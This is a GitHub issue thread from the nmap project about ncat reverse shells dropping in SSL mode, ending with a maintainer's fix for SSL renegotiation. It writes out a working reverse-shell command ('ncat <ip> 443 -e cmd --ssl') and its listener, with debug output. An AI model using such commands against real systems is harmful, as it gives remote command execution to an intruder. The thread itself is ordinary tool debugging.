Ncat reverse shell not working in ssl mode #1049

Closed
vinod272 opened this Issue Oct 28, 2017 · 5 comments

vinod272 commented Oct 28, 2017

I have ncat listening in SSL mode on my Linux box.

root@sane:~/Desktop# ncat --listen 443 --ssl -vvv
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: EAF5 2302 3E13 6E17 AEA1 0AE2 9F0B 2EB8 7F63 F291
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on :::443
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:443
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4

I am able to connect to this port in SSL mode from my Windows box with the -e cmd option to get a reverse shell, and I do get the command prompt in my Linux box, but as soon as I type any command, the connection closes with the highlighted statements in my Windows box.

C:\Users\Administrator>ncat 10.11.0.64 443 -e cmd -vvv --ssl
Ncat: Version 7.60 ( https://nmap.org/ncat )
NCAT DEBUG: Using trusted CA certificates from C:\Program Files\Nmap\ca-bundle.crt.
NCAT DEBUG: Not doing certificate verification.
libnsock nsock_iod_new2(): nsock_iod_new (IOD #1)
libnsock nsock_connect_ssl(): SSL connection requested to 10.11.0.64:443/tcp (IOD #1) EID 9
Ncat: Subject: CN=localhost
Ncat: Issuer: CN=localhost
Ncat: SHA-1 fingerprint: 48D4 40F5 AF93 19C8 99AA 369E CE52 F9D8 9DE1 A9D4
Ncat: Certificate verification failed (self signed certificate).
libnsock nsock_trace_handler_callback(): Callback: SSL-CONNECT SUCCESS for EID 9 [10.11.0.64:443]
Ncat: SSL connection to 10.11.0.64:443.
Ncat: SHA-1 fingerprint: 48D4 40F5 AF93 19C8 99AA 369E CE52 F9D8 9DE1 A9D4
libnsock nsock_iod_new2(): nsock_iod_new (IOD #2)
NCAT DEBUG: Executing: cmd
NCAT DEBUG: Creating named pipe "\.\pipe\ncat-1404-0"
NCAT DEBUG: Register subprocess 000000E0 at index 0.
NCAT DEBUG: Unregister subprocess 000000E0 from index 0.
NCAT DEBUG: Subprocess still running, terminating it.
NCAT DEBUG: Subprocess ended with exit code 259.
NCAT DEBUG: Terminating subprocesses
NCAT DEBUG: max_index 1

But everything works fine when not in SSL mode.

landon8848 commented Nov 6, 2017

I'm seeing the same behavior. I saw this was happening in earlier versions of ncat.

#197

cldrn added the Ncat label Nov 23, 2017

skippylafarge commented Feb 8, 2018

I'm also seeing this behavior. Any word on a fix or a workaround? I've read elsewhere of using --sctp instead of tcp, but that doesn't fly with Windows being involved.

Z3raa commented Feb 19, 2018

same issue here

ghost commented Mar 2, 2018

ncat 7.60 doesn't support tls 1.2 anymore since Sep 17. But when 7.50 came out in July... it did. Download the older one from nmap to your kali boxes... or try harder by compiling your own pe. <3.

dmiller-nmap commented Mar 11, 2018

Closing as a duplicate of #197. Thanks for reporting, though, since it got me to find and fix the bug (commit incoming).

nmap-bot pushed a commit that referenced this issue Mar 11, 2018

Do a 2nd SSL_read if necessary for renegotiation.
This fix was previously applied to ncat_listen's read_socket in r36652
(ac8b866) as a fix for #773. It didn't fully solve the problem, though,
since the fix should have been applied in ncat_core's fdinfo_recv, right
after the call to SSL_read. This commit moves the fix where it belongs,
which also simplifies the code.

Fixes #197 and #1049.